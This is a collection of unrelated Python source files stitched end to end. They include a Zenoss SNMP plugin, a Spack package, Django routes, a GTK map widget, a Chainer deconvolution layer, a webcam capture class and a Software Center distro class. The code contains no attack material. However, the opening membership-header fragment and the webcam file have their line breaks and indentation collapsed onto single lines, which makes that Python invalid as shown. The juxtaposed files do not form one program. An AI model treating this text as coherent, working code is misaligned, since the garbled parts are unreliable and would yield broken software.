Create form: rheader makes no sense here return None T = current.T resourcename = r.name # Tabs tabs = [(T("Person Details"), None), (T("Membership Details"), "membership"), (T("Addresses"), "address"), #(T("Contacts"), "contact"), (T("Contacts"), "contacts"), ] if resourcename == "membership": table = r.table ptable = current.s3db.pr_person query = (table.id == record.id) & \ (ptable.id == table.person_id) person = current.db(query).select(ptable.id, ptable.first_name, ptable.middle_name, ptable.last_name, limitby=(0, 1)).first() if person is not None: rheader_tabs = s3_rheader_tabs(r, tabs) rheader = DIV(DIV(s3_avatar_represent(person.id, "pr_person", _class="fleft"), _class="rheader-avatar", ), TABLE(TR(TH(s3_fullname(person))), ), rheader_tabs, ) else: rheader = None elif resourcename == "person": if current.deployment_settings.get_member_cv_tab(): tabs.append((T("CV"), "cv")) rheader_tabs = s3_rheader_tabs(r, tabs) rheader = DIV(DIV(s3_avatar_represent(record.id, "pr_person", _class="fleft"), _class="rheader-avatar", ), TABLE(TR(TH(s3_fullname(record))), ), rheader_tabs ) return rheader # END =========================================================================
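

# =============================================================================
# Illustrative sketch (not part of the original model): the paid/overdue/
# expired rule implemented by S3MembersModel.member_membership_paid, restated
# over plain datetime.date values so the thresholds (365-day renewal period,
# 183-day grace period) can be checked in isolation.
def _membership_payment_status(start_date, paid_date, today):
    """Return 'paid', 'overdue' or 'expired' for the given dates."""
    lapsed = datetime.timedelta(days=183)   # 6 months grace
    year = datetime.timedelta(days=365)
    if not paid_date:
        # Never renewed: payment falls due one year after joining
        due = start_date + year
        if today < due:
            return "paid"
        return "expired" if today > (due + lapsed) else "overdue"
    # Renewed before: due on the most recent anniversary of the start date
    if (today.month, today.day) >= (start_date.month, start_date.day):
        due = datetime.date(today.year, start_date.month, start_date.day)
    else:
        due = datetime.date(today.year - 1, start_date.month, start_date.day)
    if paid_date >= due:
        return "paid"
    return "expired" if (due - paid_date) > lapsed else "overdue"

# Example with hypothetical dates: a member who joined 2014-03-10 and last
# paid on 2015-02-01 is "overdue" on 2015-06-01 (the 2015-03-10 anniversary
# has passed), and becomes "expired" once the gap between that anniversary
# and the last payment exceeds 183 days.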
################################################################################
#
# This program is part of the HPMon Zenpack for Zenoss.
# Copyright (C) 2008-2012 Egor Puzanov.
#
# This program can be used under the GNU General Public License version 2
# You can find full information here: http://www.zenoss.com/oss
#
################################################################################

__doc__ = """HPIdeControllerMap

HPIdeControllerMap maps the cpqIdeControllerTable table to cpqIdeController
objects

$Id: HPIdeControllerMap.py,v 1.4 2012/10/11 18:57:43 egor Exp $"""
__version__ = '$Revision: 1.4 $'[11:-2]

from Products.DataCollector.plugins.CollectorPlugin import GetTableMap
from Products.DataCollector.plugins.DataMaps import MultiArgs
from HPExpansionCardMap import HPExpansionCardMap


class HPIdeControllerMap(HPExpansionCardMap):
    """Map HP/Compaq insight manager cpqIdeControllerTable table to model."""

    maptype = "cpqIdeController"
    modname = "ZenPacks.community.HPMon.cpqIdeController"

    snmpGetTableMaps = (
        GetTableMap('cpqIdeControllerTable', '.1.3.6.1.4.1.232.14.2.3.1.1',
            {
                '.3': 'setProductKey',
                '.4': 'FWRev',
                '.5': 'slot',
                '.6': 'status',
                '.8': 'serialNumber',
            }
        ),
    )

    def process(self, device, results, log):
        """collect snmp information from this device"""
        log.info('processing %s for device %s', self.name(), device.id)
        getdata, tabledata = results
        if not device.id in HPExpansionCardMap.oms:
            HPExpansionCardMap.oms[device.id] = []
        for oid, card in tabledata.get('cpqIdeControllerTable', {}).iteritems():
            try:
                om = self.objectMap(card)
                om.snmpindex = oid.strip('.')
                om.id = self.prepId("cpqIdeController%s" % om.snmpindex)
                om.slot = getattr(om, 'slot', 0)
                if om.slot == -1:
                    om.slot = 0
                if not getattr(om, 'setProductKey', ''):
                    om.setProductKey = 'Standard IDE Controller'
                om.setProductKey = MultiArgs(om.setProductKey,
                                             om.setProductKey.split()[0])
            except AttributeError:
                continue
            HPExpansionCardMap.oms[device.id].append(om)
        return
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *


class Freebayes(MakefilePackage):
    """Bayesian haplotype-based genetic polymorphism discovery and
    genotyping."""

    homepage = "https://github.com/ekg/freebayes"

    version('1.1.0', git='https://github.com/ekg/freebayes.git',
            commit='39e5e4bcb801556141f2da36aba1df5c5c60701f',
            submodules=True)

    depends_on('cmake', type='build')
    depends_on('zlib')

    parallel = False

    def edit(self, spec, prefix):
        # Redirect the Makefile's hard-coded install location to the prefix
        makefile = FileFilter('Makefile')
        b = prefix.bin
        makefile.filter('cp bin/freebayes bin/bamleftalign /usr/local/bin/',
                        'cp bin/freebayes bin/bamleftalign {0}'.format(b))

    @run_before('install')
    def make_prefix_dot_bin(self):
        mkdir(prefix.bin)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.conf.urls import url, include
from rest_framework import routers

from . import (
    views,
)

router = routers.DefaultRouter()
router.register(r'synchronizations', views.SynchronizationViewSet,
                base_name='synchronization')
router.register(r'repositories', views.RepositoryViewSet,
                base_name='repository')
router.register(r'presentations', views.PresentationViewSet,
                base_name='presentation')

app_name = 'qraz'
urlpatterns = [
    url(
        r'^$',
        views.IndexView.as_view(),
        name='index'
    ),
    url(
        r'^presentations$',
        views.PresentationsView.as_view(),
        name='presentations'
    ),
    url(
        r'^repositories$',
        views.RepositoriesView.as_view(),
        name='repositories'
    ),
    url(
        r'^help$',
        views.HelpView.as_view(),
        name='help'
    ),
    url(
        r'^logout$',
        views.LogoutView.as_view(),
        name='logout'
    ),
    url(
        r'^api/',
        include(router.urls)
    ),
    url(
        r'^webhook/(?P<username>\w[\w_\-]+)/(?P<repository>[\w\-.]+)$',
        views.WebHookView.as_view(),
        name='webhook'
    ),
    url(
        r'^(?P<username>\w[\w_\-]+)/(?P<repository>\w[\w\-.]+)/(?P<presentation>\w[\w\-\._]+)/(?P<path>.*)?$',
        views.DownloadView.as_view(),
        name='download'
    ),
]
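

# Illustrative sketch (not part of the original module): with app_name = 'qraz'
# declared above, other code can resolve these routes by namespaced name.  The
# username/repository values are placeholders; on Django versions before 1.10,
# reverse is imported from django.core.urlresolvers instead of django.urls.
def _example_reverse_urls():
    try:
        from django.urls import reverse
    except ImportError:  # Django < 1.10
        from django.core.urlresolvers import reverse
    index_url = reverse('qraz:index')
    webhook_url = reverse('qraz:webhook',
                          kwargs={'username': 'alice', 'repository': 'talks'})
    return index_url, webhook_url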
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
###############################################################################
# MapWidget.py
#
# Draws the MapConfig object.
#
# -----------------------------------------------------------------------------
# gpsmap - A GPSD simulator based on map positions
# (C) 2014 Gerardo García Peña <[email protected]>
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation; either version 3 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
###############################################################################

import pygtk
pygtk.require('2.0')
import gtk
import cairo
import logging
import math
import GPS
import gobject


class MapWidget(gtk.DrawingArea):
    """ This class is a Drawing Area"""

    __gsignals__ = {
        "expose-event": "override",
    }

    mc        = None
    select_m  = None
    select_x  = None
    select_y  = None
    visible   = None
    ruler     = None
    cp_radius = None

    def __init__(self, mc):
        super(MapWidget, self).__init__()
        self.cp_radius = 0
        self.mc = mc
        self.select_m = None
        self.select_x = None
        self.select_y = None
        self.visible = {
            "ref_points": False,
            "points":     False,
            "route":      False,
            "background": 2,
        }
        gobject.timeout_add(100, self.do_animation)

    def bg_visible(self, action, value):
        self.visible["background"] = value.get_current_value()
        self.redraw()

    def is_visible(self, action, element):
        self.visible[element] = not self.visible[element]
        self.redraw()
        return self.visible[element]

    def ruler_set_start(self, x, y):
        self.ruler = [ x, y, x, y ]
        self.redraw()

    def ruler_set_end(self, x, y):
        self.ruler[2] = x
        self.ruler[3] = y
        self.redraw()

    def ruler_unset(self):
        self.ruler = None
        self.redraw()

    def redraw(self):
        self.alloc = self.get_allocation()
        rect = gtk.gdk.Rectangle(self.alloc.x, self.alloc.y,
                                 self.alloc.width, self.alloc.height)
        if self.window is not None:
            self.window.invalidate_rect(rect, True)

    def do_animation(self):
        if self.mc is None or self.mc.curr_xy is None:
            return True
        if self.cp_radius is None or self.cp_radius > 10:
            self.cp_radius = 0
        else:
            self.cp_radius = self.cp_radius + 1
        self.redraw()
        return True
        self.alloc = self.get_allocation()
        rect = gtk.gdk.Rectangle(
            self.alloc.x + int(self.mc.curr_xy[0]) - 15,
            self.alloc.y + int(self.mc.curr_xy[1]) - 15,
            40, 40)
        if self.window is not None:
            self.window.invalidate_rect(rect, True)
        return True

    def do_draw(self, cr, draw_curr_xy):
        # copy image background
        cr.set_source_surface(self.mc.bg_surface, 0, 0)
        cr.paint()
        if self.visible["background"] != 2:
            cr.set_source_rgba(0, 0, 0, .5 if self.visible["background"] == 1 else .9)
            cr.rectangle(0, 0, self.mc.bg_w - 1, self.mc.bg_h - 1)
            cr.fill()
            cr.stroke()

        # draw route
        if self.visible["route"] and self.mc.route is not None:
            lp = None
            for p in self.mc.route:
                if lp is None:
                    cr.set_source_rgba(0, 1, 0, 0.8)
                    cr.arc(p[0], p[1], 10.0, 0, 2*math.pi)
                    cr.fill()
                    cr.stroke()
                else:
                    cr.set_source_rgba(0, 1, 0, 0.9)
                    cr.move_to(lp[0], lp[1])
                    cr.line_to(p[0], p[1])
                    cr.stroke()
                    cr.set_source_rgba(0, 1, 0, 0.4)
                    cr.arc(p[0], p[1], 10.0, 0, 2*math.pi)
                    cr.fill()
                    cr.stroke()
                lp = p

        # draw reference points
        if self.visible["ref_points"]:
            for p in [ self.mc.A, self.mc.H, self.mc.V ]:
                if p is not None:
                    cr.set_source_rgba(0, 0, 0, 1)
                    cr.set_line_width(4)
                    cr.move_to(p[0][0] - 8 + 1, p[0][1] - 8 + 1)
                    cr.line_to(p[0][0] + 8 + 1, p[0][1] + 8 + 1)
                    cr.move_to(p[0][0] - 8 + 1, p[0][1] + 8 + 1)
                    cr.line_to(p[0][0] + 8 + 1, p[0][1] - 8 + 1)
                    cr.stroke()
                    cr.set_line_width(3)
                    cr.set_source_rgba(1, 0, 0, 0.8)
                    cr.move_to(p[0][0] - 8, p[0][1] - 8)
                    cr.line_to(p[0][0] + 8, p[0][1] + 8)
                    cr.move_to(p[0][0] - 8, p[0][1] + 8)
                    cr.line_to(p[0][0] + 8, p[0][1] - 8)
                    cr.stroke()

        if self.visible["points"]:
            for n in self.mc.points.keys():
                x, y = self.mc.points[n][0], self.mc.points[n][1]
                cr.set_source_rgba(0, 0, 1, .8)
                cr.set_line_width(2)
                cr.arc(x, y, 6.0, 0, 2*math.pi)
                cr.stroke()
                cr.arc(x, y, 4.0, 0, 2*math.pi)
                cr.fill()
                cr.stroke()
                xbearing, ybearing, width, height, xadvance, yadvance = (cr.text_extents(n))
                cr.set_source_rgba(0, 0, 0, 1)
                cr.move_to(x + 1 - width/2, y + 1 + height)
                cr.show_text(n)
                cr.set_source_rgba(1, 1, 1, 1)
                cr.move_to(x - width/2, y + height)
                cr.show_text(n)
                cr.stroke()

        # draw selection
        if self.select_m is not None:
            if self.select_m == "H" or self.select_m == "A":
                cr.set_source_rgba(0, 0, 0, 1)
                cr.set_line_width(1)
                cr.move_to(0, self.select_y + 1)
                cr.line_to(self.mc.bg_w, self.select_y + 1)
                cr.stroke()
                cr.set_source_rgba(1, 1, 0, 0.7)
                cr.set_line_width(3)
                cr.move_to(0, self.select_y)
                cr.line_to(self.mc.bg_w, self.select_y)
                cr.stroke()
            if self.select_m == "V" or self.select_m == "A":
                cr.set_source_rgba(0, 0, 0, 1)
                cr.set_line_width(1)
                cr.move_to(self.select_x + 1, 0)
                cr.line_to(self.select_x + 1, self.mc.bg_h)
                cr.stroke()
                cr.set_source_rgba(1, 1, 0, 0.7)
                cr.set_line_width(3)
                cr.move_to(self.select_x, 0)
                cr.line_to(self.select_x, self.mc.bg_h)
                cr.stroke()
            if self.select_m == "P":
                cr.set_source_rgba(0, 0, 1, .4)
                cr.set_line_width(2)
                cr.arc(self.select_x, self.select_y, 4.0, 0, 2*math.pi)
                cr.stroke()
                cr.arc(self.select_x, self.select_y, 2.0, 0, 2*math.pi)
                cr.fill()
                cr.stroke()
            elif self.select_m != "A":
                cr.set_source_rgba(0, 0, 0, 1)
                cr.set_line_width(1)
                cr.move_to(self.select_x - 8 + 1, self.select_y - 8 + 1)
                cr.line_to(self.select_x + 8 + 1, self.select_y + 8 + 1)
                cr.move_to(self.select_x - 8 + 1, self.select_y + 8 + 1)
                cr.line_to(self.select_x + 8 + 1, self.select_y - 8 + 1)
                cr.stroke()
                cr.set_source_rgba(1, 1, 0, 0.7)
                cr.set_line_width(3)
                cr.move_to(self.select_x - 8, self.select_y - 8)
                cr.line_to(self.select_x + 8, self.select_y + 8)
                cr.move_to(self.select_x - 8, self.select_y + 8)
                cr.line_to(self.select_x + 8, self.select_y - 8)
                cr.stroke()

        # draw ruler
        if self.ruler is not None:
            cr.set_line_width(6)
            cr.set_source_rgba(0, 0, 0, 1)
            cr.move_to(self.ruler[0], self.ruler[1])
            cr.line_to(self.ruler[2], self.ruler[3])
            cr.stroke()
            cr.set_line_width(4)
            cr.set_source_rgba(0, 1, 0, 1)
            cr.set_dash([ 5.0 ], 0)
            cr.move_to(self.ruler[0], self.ruler[1])
            cr.line_to(self.ruler[2], self.ruler[3])
            cr.stroke()
            a = self.mc.pixel2coords(self.ruler[0], self.ruler[1])
            b = self.mc.pixel2coords(self.ruler[2], self.ruler[3])
            if a is None or b is None:
                distance = "???"
            else:
                distance = "%.2f m" % GPS.distance(a[0], a[1], b[0], b[1])
            xbearing, ybearing, width, height, xadvance, yadvance = (cr.text_extents(distance))
            x = ((self.ruler[0] + self.ruler[2]) / 2)
            y = ((self.ruler[1] + self.ruler[3]) / 2)
            cr.set_source_rgba(0, 0, 0, 0.6)
            cr.set_line_width(1)
            cr.rectangle(x - width, y - height, width*2, height*2)
            cr.fill()
            cr.stroke()
            cr.set_source_rgba(0, 0, 0, 1)
            cr.move_to(x + 1 - width/2, y + 1)
            cr.show_text(distance)
            cr.set_source_rgba(1, 1, 1, 1)
            cr.move_to(x - width/2, y)
            cr.show_text(distance)
            cr.set_dash([], 0)
            cr.stroke()

        # draw curr_xy
        if self.mc.curr_xy is not None and draw_curr_xy:
            x, y = self.mc.curr_xy[0], self.mc.curr_xy[1]
            for i in range(1, 4):
                cr.set_line_width(5 - i)
                cr.set_source_rgba(1, 0, 1, ((float(self.cp_radius) / 15.0)))
                cr.arc(x, y, (float(10 - self.cp_radius) * float(i) / 4.0) * 3 + 2, 0, 2*math.pi)
                cr.stroke()
            cr.set_source_rgba(1, 0, 1, 1)
            cr.arc(x, y, 2.5, 0, 2*math.pi)
            cr.fill()
            cr.stroke()

    def do_expose_event(self, event):
        if self.mc is None \
        or self.mc.bg_surface is None:
            self.set_size_request(0, 0)
            return

        # set widget size based on image map
        self.set_size_request(self.mc.bg_w, self.mc.bg_h)

        # create cairo surface
        cr = self.window.cairo_create()
        cr.rectangle(event.area.x, event.area.y, event.area.width, event.area.height)
        cr.clip()
        self.do_draw(cr, True)

    def select_mode(self, mode, x = 0, y = 0):
        if mode is None:
            self.select_x = None
            self.select_y = None
            self.select_m = None
            self.redraw()
            return
        if mode != "H" and mode != "V" and mode != "A" and mode != "P":
            logging.error("Bad selection mode '%s'." % mode)
            return
        self.select_m = mode
        self.select_x = x
        self.select_y = y
        self.redraw()

    def save_png(self, path):
        logging.info("\t%s: Saving image (%d, %d) pixels" % (path, self.mc.bg_w, self.mc.bg_h))
        logging.info("\t%s: Creating cairo context and surface" % (path))
        dst_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, self.mc.bg_w, self.mc.bg_h)
        dst_ctx = cairo.Context(dst_surface)
        logging.info("\t%s: drawing" % (path))
        self.do_draw(dst_ctx, False)
        logging.info("\t%s: writing" % (path))
        dst_surface.write_to_png(path)
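# Minimal embedding sketch (not from the original project): MapWidget only
# needs a MapConfig-like object exposing the attributes used above
# (bg_surface, bg_w, bg_h, curr_xy, route, points, A, H, V, pixel2coords).
# The function name and map_config argument are illustrative.
def show_map_window(map_config):
    window = gtk.Window(gtk.WINDOW_TOPLEVEL)
    window.set_title("gpsmap")
    window.connect("destroy", lambda w: gtk.main_quit())
    scroll = gtk.ScrolledWindow()
    scroll.add_with_viewport(MapWidget(map_config))
    window.add(scroll)
    window.show_all()
    gtk.main()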
import numpy

from chainer.backends import cuda
from chainer.functions.connection import deconvolution_2d
from chainer import initializers
from chainer import link
from chainer.utils import argument
from chainer import variable


class Deconvolution2D(link.Link):

    """__init__(self, in_channels, out_channels, ksize=None, stride=1, pad=0, nobias=False, outsize=None, initialW=None, initial_bias=None, *, groups=1)

    Two dimensional deconvolution function.

    This link wraps the :func:`~chainer.functions.deconvolution_2d` function
    and holds the filter weight and bias vector as parameters.

    Deconvolution links can use a feature of cuDNN called autotuning, which
    selects the most efficient CNN algorithm for images of fixed-size, and can
    provide a significant performance boost for fixed neural nets.
    To enable, set `chainer.using_config('autotune', True)`

    Args:
        in_channels (int or None): Number of channels of input arrays.
            If ``None``, parameter initialization will be deferred until the
            first forward data pass at which time the size will be determined.
        out_channels (int): Number of channels of output arrays.
        ksize (int or pair of ints): Size of filters (a.k.a. kernels).
            ``ksize=k`` and ``ksize=(k, k)`` are equivalent.
        stride (int or pair of ints): Stride of filter applications.
            ``stride=s`` and ``stride=(s, s)`` are equivalent.
        pad (int or pair of ints): Spatial padding width for input arrays.
            ``pad=p`` and ``pad=(p, p)`` are equivalent.
        nobias (bool): If ``True``, then this function does not use the bias
            term.
        outsize (tuple): Expected output size of deconvolutional operation.
            It should be pair of height and width :math:`(out_H, out_W)`.
            Default value is ``None`` and the outsize is estimated by
            input size, stride and pad.
        initialW (:ref:`initializer <initializer>`): Initializer to
            initialize the weight. When it is :class:`numpy.ndarray`,
            its ``ndim`` should be 4.
        initial_bias (:ref:`initializer <initializer>`): Initializer to
            initialize the bias. If ``None``, the bias will be initialized to
            zero. When it is :class:`numpy.ndarray`, its ``ndim`` should be 1.
        groups (int): The number of groups to use grouped deconvolution. The
            default is one, where grouped deconvolution is not used.

    The filter weight has four dimensions :math:`(c_I, c_O, k_H, k_W)`
    which indicate the number of input channels, output channels,
    height and width of the kernels, respectively.
    The filter weight is initialized with i.i.d. Gaussian random samples, each
    of which has zero mean and deviation :math:`\\sqrt{1/(c_I k_H k_W)}` by
    default.

    The bias vector is of size :math:`c_O`.
    Its elements are initialized by ``bias`` argument.
    If ``nobias`` argument is set to True, then this function does not hold
    the bias parameter.

    The output of this function can be non-deterministic when it uses cuDNN.
    If ``chainer.configuration.config.cudnn_deterministic`` is ``True`` and
    cuDNN version is >= v3, it forces cuDNN to use a deterministic algorithm.

    .. seealso::
       See :func:`chainer.functions.deconvolution_2d` for the definition of
       two-dimensional convolution.

    .. seealso::
        See :func:`chainer.links.Convolution2D` for the examples of ways to
        give arguments to this link.

    .. admonition:: Example

        There are several ways to make a Deconvolution2D link.

        Let an input vector ``x`` be:

        >>> x = np.arange(1 * 3 * 10 * 10, dtype=np.float32).reshape(1, 3, 10, 10)

        1. Give the first three arguments explicitly:

            In this case, all the other arguments are set to the default
            values.

            >>> l = L.Deconvolution2D(3, 7, 4)
            >>> y = l(x)
            >>> y.shape
            (1, 7, 13, 13)

        2. Omit ``in_channels`` or fill it with ``None``:

            The below two cases are the same.

            >>> l = L.Deconvolution2D(7, 4)
            >>> y = l(x)
            >>> y.shape
            (1, 7, 13, 13)

            >>> l = L.Deconvolution2D(None, 7, 4)
            >>> y = l(x)
            >>> y.shape
            (1, 7, 13, 13)

            When you omit the first argument, you need to specify the other
            subsequent arguments from ``stride`` as keyword arguments. So the
            below two cases are the same.

            >>> l = L.Deconvolution2D(None, 7, 4, 2, 1)
            >>> y = l(x)
            >>> y.shape
            (1, 7, 20, 20)

            >>> l = L.Deconvolution2D(7, 4, stride=2, pad=1)
            >>> y = l(x)
            >>> y.shape
            (1, 7, 20, 20)

    """  # NOQA

    def __init__(self, in_channels, out_channels, ksize=None, stride=1,
                 pad=0, nobias=False, outsize=None, initialW=None,
                 initial_bias=None, **kwargs):
        super(Deconvolution2D, self).__init__()

        groups, = argument.parse_kwargs(
            kwargs, ('groups', 1),
            deterministic="deterministic argument is not supported anymore. "
            "Use chainer.using_config('cudnn_deterministic', value) "
            "context where value is either `True` or `False`.")

        if ksize is None:
            out_channels, ksize, in_channels = in_channels, out_channels, None

        self.ksize = ksize
        self.stride = _pair(stride)
        self.pad = _pair(pad)
        self.outsize = (None, None) if outsize is None else outsize
        self.out_channels = out_channels
        self.groups = int(groups)

        with self.init_scope():
            W_initializer = initializers._get_initializer(initialW)
            self.W = variable.Parameter(W_initializer)
            if in_channels is not None:
                self._initialize_params(in_channels)

            if nobias:
                self.b = None
            else:
                if isinstance(initial_bias, (numpy.ndarray, cuda.ndarray)):
                    assert initial_bias.shape == (out_channels,)
                if initial_bias is None:
                    initial_bias = 0
                bias_initializer = initializers._get_initializer(initial_bias)
                self.b = variable.Parameter(bias_initializer, out_channels)

    def _initialize_params(self, in_channels):
        kh, kw = _pair(self.ksize)
        if self.out_channels % self.groups != 0:
            raise ValueError('the number of output channels must be '
                             'divisible by the number of groups')
        if in_channels % self.groups != 0:
            raise ValueError('the number of input channels must be '
                             'divisible by the number of groups')
        W_shape = (in_channels, int(self.out_channels / self.groups), kh, kw)
        self.W.initialize(W_shape)

    def forward(self, x):
        if self.W.array is None:
            self._initialize_params(x.shape[1])
        return deconvolution_2d.deconvolution_2d(
            x, self.W, self.b, self.stride, self.pad, self.outsize,
            groups=self.groups)


def _pair(x):
    if hasattr(x, '__getitem__'):
        return x
    return x, x
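# Worked check (not part of the original link) of the docstring shapes above,
# assuming the usual transposed-convolution size formula applied when
# ``outsize`` is None:  out = stride * (in - 1) + ksize - 2 * pad.
def _deconv_outsize(in_size, ksize, stride, pad):
    return stride * (in_size - 1) + ksize - 2 * pad

assert _deconv_outsize(10, ksize=4, stride=1, pad=0) == 13   # -> (1, 7, 13, 13)
assert _deconv_outsize(10, ksize=4, stride=2, pad=1) == 20   # -> (1, 7, 20, 20)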
""" sc_webcam.py This file includes functions to: initialise a web cam capture image from web cam Image size is held in the smart_camera.cnf """ import sys import time import math import cv2 import sc_config class SmartCameraWebCam: def __init__(self, instance): # health self.healthy = False; # record instance self.instance = instance self.config_group = "camera%d" % self.instance # get image resolution self.img_width = sc_config.config.get_integer(self.config_group,'width',640) self.img_height = sc_config.config.get_integer(self.config_group,'height',480) # background image processing variables self.img_counter = 0 # num images requested so far # latest image captured self.latest_image = None # setup video capture self.camera = cv2.VideoCapture(self.instance) # check we can connect to camera if not self.camera.isOpened(): print ("failed to open webcam %d" % self.instance) # __str__ - print position vector as string def __str__(self): return "SmartCameraWebCam Object W:%d H:%d" % (self.img_width, self.img_height) # latest_image - returns latest image captured def get_latest_image(self): # write to file #imgfilename = "C:\Users\rmackay9\Documents\GitHub\ardupilot-balloon-finder\smart_camera\img%d-%d.jpg" % (cam_num,cam.get_image_counter()) imgfilename = "img%d-%d.jpg" % (self.instance,self.get_image_counter()) print (imgfilename) cv2.imwrite(imgfilename, self.latest_image) return self.latest_image # get_image_counter - returns number of images captured since startup def get_image_counter(self): return self.img_counter # take_picture - take a picture # returns True on success def take_picture(self): # setup video capture print("Taking Picture") self.camera = cv2.VideoCapture(self.instance) self.camera.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH,self.img_width) self.camera.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT,self.img_height) # check we can connect to camera if not self.camera.isOpened(): self.healty = False return False # get an image from the webcam success_flag, self.latest_image=self.camera.read() # release camera self.camera.release() # if successful overwrite our latest image if success_flag: self.img_counter = self.img_counter+1 return True # return failure return False # main - tests SmartCameraWebCam class def main(self): while True: # send request to image capture for image if self.take_picture(): # display image cv2.imshow ('image_display', self.get_latest_image()) else: print ("no image") # check for ESC key being pressed k = cv2.waitKey(5) & 0xFF if k == 27: break # take a rest for a bit time.sleep(0.01) # run test run from the command line if __name__ == "__main__": sc_webcam0 = SmartCameraWebCam(0) sc_webcam0.main()
# Copyright (C) 2009 Canonical
#
# Authors:
#  Michael Vogt
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; version 3.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA

import logging
import os

from gettext import gettext as _

import lsb_release

from softwarecenter.utils import UnimplementedError, utf8

log = logging.getLogger(__name__)


class Distro(object):
    """ abstract base class for a distribution """

    # list of code names for the distro from newest to oldest, this is
    # used e.g. in the reviews loader if no reviews for the current codename
    # are found
    DISTROSERIES = []

    # base path for the review summary, the JS will append %i.png (with i={1,5})
    REVIEW_SUMMARY_STARS_BASE_PATH = "/usr/share/software-center/images/review-summary"

    REVIEWS_SERVER = os.environ.get("SOFTWARE_CENTER_REVIEWS_HOST") or "http://localhost:8000"

    # You need to set this var to enable purchases
    PURCHASE_APP_URL = ""

    # Point developers to a web page
    DEVELOPER_URL = ""

    def __init__(self, lsb_info):
        """Return a new generic Distro instance."""
        self.lsb_info = lsb_info

    def get_app_name(self):
        """
        The name of the application (as displayed in the main window
        and the about window)
        """
        return _("Software Center")

    def get_app_description(self):
        """
        The description of the application displayed in the about dialog
        """
        return _("Lets you choose from thousands of applications available for your system.")

    def get_distro_channel_name(self):
        """ The name of the main channel in the Release file (e.g. Ubuntu)"""
        return "none"

    def get_distro_channel_description(self):
        """ The description for the main distro channel """
        return "none"

    def get_codename(self):
        """ The codename of the distro, e.g. lucid """
        # for tests and similar
        if "SOFTWARE_CENTER_DISTRO_CODENAME" in os.environ:
            return os.environ["SOFTWARE_CENTER_DISTRO_CODENAME"]
        # normal behavior
        if not hasattr(self, "_distro_code_name"):
            self._distro_code_name = \
                lsb_release.get_distro_information()["CODENAME"]
        return self._distro_code_name

    def get_maintenance_status(self, cache, appname, pkgname, component,
                               channelname):
        raise UnimplementedError

    def get_license_text(self, component):
        raise UnimplementedError

    def is_supported(self, cache, doc, pkgname):
        """ return True if the given document and pkgname is supported by
            the distribution
        """
        raise UnimplementedError

    def get_supported_query(self):
        """ return a xapian query that gives all supported documents """
        import xapian
        return xapian.Query()

    def get_supported_filter_name(self):
        return _("Supported Software")

    def get_install_warning_text(self, cache, pkg, appname, depends):
        primary = utf8(_("To install %s, these items must be removed:")) % utf8(appname)
        button_text = _("Install Anyway")

        # alter it if a meta-package is affected
        for m in depends:
            if cache[m].section == "metapackages":
                primary = utf8(_("If you install %s, future updates will not "
                                 "include new items in <b>%s</b> set. "
                                 "Are you sure you want to continue?")) % (
                    utf8(appname), cache[m].installed.summary)
                button_text = _("Install Anyway")
                depends = []
                break

        # alter it if an important meta-package is affected
        for m in self.IMPORTANT_METAPACKAGES:
            if m in depends:
                primary = utf8(_("Installing %s may cause core applications to "
                                 "be removed. "
                                 "Are you sure you want to continue?")) % utf8(appname)
                button_text = _("Install Anyway")
                depends = None
                break

        return (primary, button_text)

    # generic version of deauthorize, can be customized by the distro
    def get_deauthorize_text(self, account_name, purchased_packages):
        if len(purchased_packages) == 0:
            if account_name:
                primary = _('Are you sure you want to deauthorize this computer '
                            'from the "%s" account?') % account_name
            else:
                primary = _('Are you sure you want to deauthorize this computer '
                            'for purchases?')
            button_text = _('Deauthorize')
        else:
            if account_name:
                primary = _('Deauthorizing this computer from the "%s" account '
                            'will remove this purchased software:') % account_name
            else:
                primary = _('Deauthorizing this computer for purchases '
                            'will remove the following purchased software:')
            button_text = _('Remove All')
        return (primary, button_text)

    # generic architecture detection code
    def get_architecture(self):
        return None


def _get_distro():
    lsb_info = lsb_release.get_distro_information()
    distro_id = lsb_info["ID"]
    log.debug("get_distro: '%s'", distro_id)
    # start with an import, this gives us only a softwarecenter module
    module = __import__(distro_id, globals(), locals(), [], -1)
    # get the right class and instantiate it
    distro_class = getattr(module, distro_id)
    instance = distro_class(lsb_info)
    return instance


def get_distro():
    """ factory to return the right Distro object """
    return distro_instance


def get_current_arch():
    return get_distro().get_architecture()


def get_foreign_architectures():
    return get_distro().get_foreign_architectures()


# singleton
distro_instance = _get_distro()


if __name__ == "__main__":
    print(get_distro())
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import logging

import ray
from ray.rllib.policy.sample_batch import SampleBatch
